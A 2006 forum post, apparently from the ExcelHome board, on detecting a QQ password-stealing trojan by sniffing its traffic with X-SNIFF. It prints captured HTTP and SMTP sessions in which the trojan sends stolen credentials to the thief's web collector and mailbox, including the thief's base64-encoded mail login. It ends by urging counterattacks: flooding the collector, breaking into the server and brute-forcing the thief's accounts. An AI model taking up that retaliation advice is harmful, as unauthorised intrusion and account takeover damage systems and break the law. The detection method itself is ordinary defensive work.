ExcelHome技术论坛

 找回密码
 免费注册

QQ登录

只需一步,快速开始

快捷登录

搜索
EH技术汇-专业的职场技能充电站 妙哉!函数段子手趣味讲函数 Excel服务器-会Excel,做管理系统 效率神器,一键搞定繁琐工作
HR薪酬管理数字化实战 Excel 2021函数公式学习大典 Excel数据透视表实战秘技 打造核心竞争力的职场宝典
让更多数据处理,一键完成 数据工作者的案头书 免费直播课集锦 ExcelHome出品 - VBA代码宝免费下载
用ChatGPT与VBA一键搞定Excel WPS表格从入门到精通 Excel VBA经典代码实践指南
查看: 2683|回复: 0

[分享]如何冷静应对偷QQ程序

[复制链接]

TA的精华主题

TA的得分主题

发表于 2006-5-27 18:14 | 显示全部楼层 |阅读模式
当发现QQ登陆窗口的密码输入口的保护锁被禁用了 如图中红框所圈 这时你就要小心了,你的机器有90%以上的可能性中了偷QQ的木马了! 当然,现在盗QQ的程序越做越好了。破坏锁后图标弄成和正常的一样。这就让人郁闷了。 不过不要紧,让我来教你如何对付它! 首先准备好家伙 :X-SNIFF 进入X-SNIFF所在目录后 运行命令:xsniff -tcp -asc -pass -log qq.txt =========================== 小知识: 为什么要输入这命令呢? -tcp 嗅探所有通过TCP协议传输的包 tcp嗅探模式最好配合-asc参数 以ASCII模式输出嗅探数据 这样像“阿拉”那些用ASP来收信的木马的收信地址就会被我们嗅到了! -pass 嗅探密码 用此参数,可以嗅探到用EMAIL收信的QQ木马的相应EMAIL及帐号密码 =========================== 然后打开QQ登陆窗口 随便输入一个QQ号和密码然后登陆 等出现正登陆的窗口时就可以关掉QQ了(当然,你也可以等到密码报错时关甚至使用真的QQ) 这时,不管是ASP收信还是EMAIL收信的盗QQ木马都会现出原形 例子1: 阿拉的ASP收信模式(嗅探结果) POST /ald/tmdqq.asp HTTP/1.1 Accept: Accept: */*, /ald/tmdqq.asp, 192.168.0.6 Content-Type: application/x-www-form-urlencoded User-Agent: MyApp Host: http:// 192.168.0.6/ald/tmdqq.asp Content-Length: 25 Cache-Control: no-cache Cookie: ASPSESSIONIDCCTQCARD=GFNGKMAAILIKOIBLPJAOOFON num=74444444&pass=netpatch 他的收信地址为: http:// 192.168.0.6/ald/tmdqq.asp 收信参数为 num=74444444&pass=netpatch 提交模式为: http:// 192.168.0.6/ald/tmdqq.asp?num=74444444&pass=netpatch 例子2: 阿拉的Email收信模式(嗅探结果) TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=12 TTL=128 Len=80 ---PA- AUTH LOGIN //请求登陆邮件服务器 TCP 202.108.5.141->192.168.0.77 Port: 25->1049 Bytes=18 TTL=52 Len=80 ---PA- 334 dXNlcm5hbWU6 //服务器要求输入用户名 TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=10 TTL=128 Len=80 ---PA- dHJ5NHFx //盗贼的EMAIL的ID(base64加密) TCP 202.108.5.141->192.168.0.77 Port: 25->1049 Bytes=18 TTL=52 Len=80 ---PA- 334 UGFzc3dvcmQ6 //服务器要求输入EMAIL登陆密码 TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=10 TTL=128 Len=80 ---PA- NzQxODUy //盗贼的EMAIL登陆密码(base64加密) TCP 202.108.5.141->192.168.0.77 Port: 25->1049 Bytes=31 TTL=52 Len=80 ---PA- 235 Authentication successful //服务器反馈登陆成功标志TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=29 TTL=128 Len=80 ---PA- MAIL FROM: //QQ密码发信地址 TCP 202.108.5.141->192.168.0.77 Port: 25->1049 Bytes=13 TTL=52 Len=80 ---PA- 250 Mail OK //反馈设置信息 TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=27 TTL=128 Len=80 ---PA- RCPT TO: //QQ密码收信地址TCP 202.108.5.141->192.168.0.77 Port: 25->1049 Bytes=13 TTL=52 Len=80 ---PA- 250 Mail OK //反馈设置信息 TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=6 TTL=128 Len=80 ---PA- DATA TCP 202.108.5.141->192.168.0.77 Port: 25->1049 Bytes=37 TTL=52 Len=80 ---PA- 354 End data with . TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=345 TTL=128 Len=80 ---PA- From: ................ To: Subject:77777----netpatch //QQ号码和密码 Content-Type: text/html; charset="GB2312" L9NTdhkmuwwx113368ACGHJLNQQSUW ------------------------------ ....:77777 ....:netpatch ------------------------------ IP....:218.104.xxx.xxx ........:................ 这时,我们可以有2种方法对付这种偷QQ的 1。用我写的 啊拉ASP收信 攻击程序,发他几万个加QQ和密码过去让他试个爽 2。渗透那服务器。 对于EMAIL接收的,如果对方只用一个EMAIL,那就简单了,拿到密码和ID,你说能做什么呢?如果对方用两个EMAIL,就看你的运气啦,看看密码是否相同或相近?用社会工程学或爆破其密码! 再不行,还是一样,发一堆假的过去。或者再想别的办法。 其他的盗Q程序基本相同。我就不多说了。 ========================= 有什么错误,请批评指正!
您需要登录后才可以回帖 登录 | 免费注册

本版积分规则

手机版|关于我们|联系我们|ExcelHome

GMT+8, 2024-11-18 00:21 , Processed in 0.034234 second(s), 8 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 1999-2023 Wooffice Inc.

沪公网安备 31011702000001号 沪ICP备11019229号-2

本论坛言论纯属发表者个人意见,任何违反国家相关法律的言论,本站将协助国家相关部门追究发言者责任!     本站特聘法律顾问:李志群律师

快速回复 返回顶部 返回列表